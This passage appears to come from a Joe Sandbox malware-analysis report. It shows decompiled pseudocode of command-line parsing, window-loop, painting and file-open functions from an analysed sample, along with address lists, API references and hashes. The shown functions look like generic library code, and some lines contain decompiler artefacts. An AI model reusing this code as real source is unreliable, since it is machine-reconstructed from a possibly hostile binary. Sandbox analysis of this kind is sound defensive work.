							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E0040500C(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                                                                                                                                                                                            0x00402a20
                                                                                                                                                                                                                            0x00402a22
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a32
                                                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a32
                                                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                                                            0x00402a38
                                                                                                                                                                                                                            0x00402a3b
                                                                                                                                                                                                                            0x00402a48
                                                                                                                                                                                                                            0x00402a4a
                                                                                                                                                                                                                            0x00402a91
                                                                                                                                                                                                                            0x00402a91
                                                                                                                                                                                                                            0x00402a95
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a50
                                                                                                                                                                                                                            0x00402a84
                                                                                                                                                                                                                            0x00402a8d
                                                                                                                                                                                                                            0x00402a8f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a8f
                                                                                                                                                                                                                            0x00402a58
                                                                                                                                                                                                                            0x00402a6a
                                                                                                                                                                                                                            0x00402a6a
                                                                                                                                                                                                                            0x00402a6e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a5d
                                                                                                                                                                                                                            0x00402a66
                                                                                                                                                                                                                            0x00402a68
                                                                                                                                                                                                                            0x00402a68
                                                                                                                                                                                                                            0x00402a77
                                                                                                                                                                                                                            0x00402a7f
                                                                                                                                                                                                                            0x00402a7f
                                                                                                                                                                                                                            0x00402a77
                                                                                                                                                                                                                            0x00402a9b
                                                                                                                                                                                                                            0x00402aa0
                                                                                                                                                                                                                            0x00402aa2
                                                                                                                                                                                                                            0x00402aa4
                                                                                                                                                                                                                            0x00402af9
                                                                                                                                                                                                                            0x00402af9
                                                                                                                                                                                                                            0x00402afd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aaa
                                                                                                                                                                                                                            0x00402ae5
                                                                                                                                                                                                                            0x00402aec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402af0
                                                                                                                                                                                                                            0x00402af3
                                                                                                                                                                                                                            0x00402af4
                                                                                                                                                                                                                            0x00402af5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402ab2
                                                                                                                                                                                                                            0x00402acb
                                                                                                                                                                                                                            0x00402acb
                                                                                                                                                                                                                            0x00402acf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ab7
                                                                                                                                                                                                                            0x00402abe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ac2
                                                                                                                                                                                                                            0x00402ac5
                                                                                                                                                                                                                            0x00402ac6
                                                                                                                                                                                                                            0x00402ac7
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ad8
                                                                                                                                                                                                                            0x00402ae0
                                                                                                                                                                                                                            0x00402ae0
                                                                                                                                                                                                                            0x00402ad8
                                                                                                                                                                                                                            0x00402b05
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00402a3b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A53
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A5D
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A7A
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A84
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AAD
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AB7
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402ADB
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AE5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                            • String ID: "$"
                                                                                                                                                                                                                            • API String ID: 3213498283-3758156766
                                                                                                                                                                                                                            • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                                                            • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00457244 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 144windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x45750c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E004397DC();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x49da70; // 0x422f48
					E00406A70(_t50,  &_v36);
					E0040D144(_v36, 1);
					E00404378();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x49ebb8; // 0x0
				E004596E4(_t56);
				_push(_t127);
				_push(0x4574ef);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x49be70; // 0x0
				_v20 = _t60;
				_t61 =  *0x49ebbc; // 0x0
				_t62 =  *0x49ebbc; // 0x0
				E0041ACE8( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t65 =  *0x49ebbc; // 0x0
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x49ebbc; // 0x0
				_v22 =  *((intOrPtr*)(_t66 + 0x44));
				_t68 =  *0x49ebbc; // 0x0
				E00458714(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t70 =  *0x49ebbc; // 0x0
				_v28 =  *((intOrPtr*)(_t70 + 0x48));
				_v16 = E00451600(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x4574cd);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00457194(_v8);
				_push(_t127);
				_push(0x45742c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x49ebb8; // 0x0
					E0045A580(_t80, _t124, _t125);
					_t82 =  *0x49ebb8; // 0x0
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E004570F4(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
				_t90 = E00441704(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x457433);
				return E0045718C();
			}





























                                                                                                                                                                                                                            0x00457244
                                                                                                                                                                                                                            0x00457244
                                                                                                                                                                                                                            0x00457244
                                                                                                                                                                                                                            0x00457245
                                                                                                                                                                                                                            0x00457247
                                                                                                                                                                                                                            0x0045724a
                                                                                                                                                                                                                            0x0045724b
                                                                                                                                                                                                                            0x0045724e
                                                                                                                                                                                                                            0x00457251
                                                                                                                                                                                                                            0x00457256
                                                                                                                                                                                                                            0x00457257
                                                                                                                                                                                                                            0x0045725c
                                                                                                                                                                                                                            0x0045725f
                                                                                                                                                                                                                            0x00457262
                                                                                                                                                                                                                            0x0045726e
                                                                                                                                                                                                                            0x00457297
                                                                                                                                                                                                                            0x0045729c
                                                                                                                                                                                                                            0x004572ab
                                                                                                                                                                                                                            0x004572b0
                                                                                                                                                                                                                            0x004572b0
                                                                                                                                                                                                                            0x004572bc
                                                                                                                                                                                                                            0x004572ca
                                                                                                                                                                                                                            0x004572ca
                                                                                                                                                                                                                            0x004572cf
                                                                                                                                                                                                                            0x004572d4
                                                                                                                                                                                                                            0x004572d9
                                                                                                                                                                                                                            0x004572e0
                                                                                                                                                                                                                            0x004572e1
                                                                                                                                                                                                                            0x004572e6
                                                                                                                                                                                                                            0x004572e9
                                                                                                                                                                                                                            0x004572ef
                                                                                                                                                                                                                            0x004572fb
                                                                                                                                                                                                                            0x004572fe
                                                                                                                                                                                                                            0x00457303
                                                                                                                                                                                                                            0x00457306
                                                                                                                                                                                                                            0x0045730e
                                                                                                                                                                                                                            0x00457318
                                                                                                                                                                                                                            0x0045731d
                                                                                                                                                                                                                            0x00457325
                                                                                                                                                                                                                            0x00457328
                                                                                                                                                                                                                            0x00457331
                                                                                                                                                                                                                            0x00457337
                                                                                                                                                                                                                            0x0045733c
                                                                                                                                                                                                                            0x00457341
                                                                                                                                                                                                                            0x00457349
                                                                                                                                                                                                                            0x00457353
                                                                                                                                                                                                                            0x00457358
                                                                                                                                                                                                                            0x00457359
                                                                                                                                                                                                                            0x0045735e
                                                                                                                                                                                                                            0x00457361
                                                                                                                                                                                                                            0x00457367
                                                                                                                                                                                                                            0x0045736e
                                                                                                                                                                                                                            0x0045736f
                                                                                                                                                                                                                            0x00457374
                                                                                                                                                                                                                            0x00457377
                                                                                                                                                                                                                            0x0045738c
                                                                                                                                                                                                                            0x00457396
                                                                                                                                                                                                                            0x0045739c
                                                                                                                                                                                                                            0x0045739c
                                                                                                                                                                                                                            0x004573a1
                                                                                                                                                                                                                            0x004573a6
                                                                                                                                                                                                                            0x004573b2
                                                                                                                                                                                                                            0x004573cd
                                                                                                                                                                                                                            0x004573d2
                                                                                                                                                                                                                            0x004573d2
                                                                                                                                                                                                                            0x004573b4
                                                                                                                                                                                                                            0x004573b7
                                                                                                                                                                                                                            0x004573b7
                                                                                                                                                                                                                            0x004573da
                                                                                                                                                                                                                            0x004573e0
                                                                                                                                                                                                                            0x004573e4
                                                                                                                                                                                                                            0x004573f9
                                                                                                                                                                                                                            0x00457401
                                                                                                                                                                                                                            0x0045740f
                                                                                                                                                                                                                            0x00457413
                                                                                                                                                                                                                            0x00457413
                                                                                                                                                                                                                            0x00457418
                                                                                                                                                                                                                            0x0045741b
                                                                                                                                                                                                                            0x0045741e
                                                                                                                                                                                                                            0x0045742b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                                                                            • String ID: H/B
                                                                                                                                                                                                                            • API String ID: 862346643-184950203
                                                                                                                                                                                                                            • Opcode ID: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                                                                                                                                                                                            • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043F510 Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043F510(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E0041AC6C( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E00424950(0xff000010));
							E00419804( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E00424950(0xff000014));
							E00419804( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E0041ACC8(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E0041AC6C( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00419804( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E004398B8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E0043C130(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                                                                                                                                                                                                            0x0043f514
                                                                                                                                                                                                                            0x0043f517
                                                                                                                                                                                                                            0x0043f519
                                                                                                                                                                                                                            0x0043f51b
                                                                                                                                                                                                                            0x0043f524
                                                                                                                                                                                                                            0x0043f542
                                                                                                                                                                                                                            0x0043f542
                                                                                                                                                                                                                            0x0043f545
                                                                                                                                                                                                                            0x0043f54d
                                                                                                                                                                                                                            0x0043f632
                                                                                                                                                                                                                            0x0043f632
                                                                                                                                                                                                                            0x0043f63a
                                                                                                                                                                                                                            0x0043f73f
                                                                                                                                                                                                                            0x0043f73f
                                                                                                                                                                                                                            0x0043f73f
                                                                                                                                                                                                                            0x0043f643
                                                                                                                                                                                                                            0x0043f646
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f64d
                                                                                                                                                                                                                            0x0043f651
                                                                                                                                                                                                                            0x0043f653
                                                                                                                                                                                                                            0x0043f65b
                                                                                                                                                                                                                            0x0043f660
                                                                                                                                                                                                                            0x0043f669
                                                                                                                                                                                                                            0x0043f6a3
                                                                                                                                                                                                                            0x0043f6c6
                                                                                                                                                                                                                            0x0043f6d1
                                                                                                                                                                                                                            0x0043f6db
                                                                                                                                                                                                                            0x0043f6f0
                                                                                                                                                                                                                            0x0043f713
                                                                                                                                                                                                                            0x0043f71e
                                                                                                                                                                                                                            0x0043f728
                                                                                                                                                                                                                            0x0043f728
                                                                                                                                                                                                                            0x0043f72d
                                                                                                                                                                                                                            0x0043f72e
                                                                                                                                                                                                                            0x0043f72e
                                                                                                                                                                                                                            0x0043f72e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f653
                                                                                                                                                                                                                            0x0043f553
                                                                                                                                                                                                                            0x0043f557
                                                                                                                                                                                                                            0x0043f560
                                                                                                                                                                                                                            0x0043f564
                                                                                                                                                                                                                            0x0043f566
                                                                                                                                                                                                                            0x0043f566
                                                                                                                                                                                                                            0x0043f564
                                                                                                                                                                                                                            0x0043f571
                                                                                                                                                                                                                            0x0043f577
                                                                                                                                                                                                                            0x0043f57d
                                                                                                                                                                                                                            0x0043f58a
                                                                                                                                                                                                                            0x0043f590
                                                                                                                                                                                                                            0x0043f5be
                                                                                                                                                                                                                            0x0043f5d0
                                                                                                                                                                                                                            0x0043f5d6
                                                                                                                                                                                                                            0x0043f5d8
                                                                                                                                                                                                                            0x0043f5d8
                                                                                                                                                                                                                            0x0043f5e4
                                                                                                                                                                                                                            0x0043f5f0
                                                                                                                                                                                                                            0x0043f602
                                                                                                                                                                                                                            0x0043f612
                                                                                                                                                                                                                            0x0043f61d
                                                                                                                                                                                                                            0x0043f622
                                                                                                                                                                                                                            0x0043f622
                                                                                                                                                                                                                            0x0043f5d0
                                                                                                                                                                                                                            0x0043f628
                                                                                                                                                                                                                            0x0043f629
                                                                                                                                                                                                                            0x0043f57d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 375863564-0
                                                                                                                                                                                                                            • Opcode ID: 8535f061f58d91ec7875d8a93a00a35639cace3c28fd1a3b42cad5b16738879b
                                                                                                                                                                                                                            • Instruction ID: 085781c14da3806a19508914d9dc02b8af2cdac2da7d1e5622b20ea0d846e8a9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8535f061f58d91ec7875d8a93a00a35639cace3c28fd1a3b42cad5b16738879b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC516F71A04200ABD714EF69C8C5B5B77D8AF49308F04546AEE89CB397D738EC45CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402D70 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E00402D70(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402D04;
				}
				_t59[9] = E00402D50;
				_t59[8] = E00402D00;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402D00;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x49e3e8) {
							_t31 = GetStdHandle(0xfffffff5);
						} else {
							_t31 = GetStdHandle(0xfffffff4);
						}
					} else {
						_t31 = GetStdHandle(0xfffffff6);
					}
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402D04;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                                                                                                                                                                            0x00402d71
                                                                                                                                                                                                                            0x00402d75
                                                                                                                                                                                                                            0x00402d78
                                                                                                                                                                                                                            0x00402d84
                                                                                                                                                                                                                            0x00402d91
                                                                                                                                                                                                                            0x00402d96
                                                                                                                                                                                                                            0x00402d9b
                                                                                                                                                                                                                            0x00402da0
                                                                                                                                                                                                                            0x00402d86
                                                                                                                                                                                                                            0x00402d87
                                                                                                                                                                                                                            0x00402da9
                                                                                                                                                                                                                            0x00402dae
                                                                                                                                                                                                                            0x00402db3
                                                                                                                                                                                                                            0x00402d89
                                                                                                                                                                                                                            0x00402d8a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402dba
                                                                                                                                                                                                                            0x00402dbf
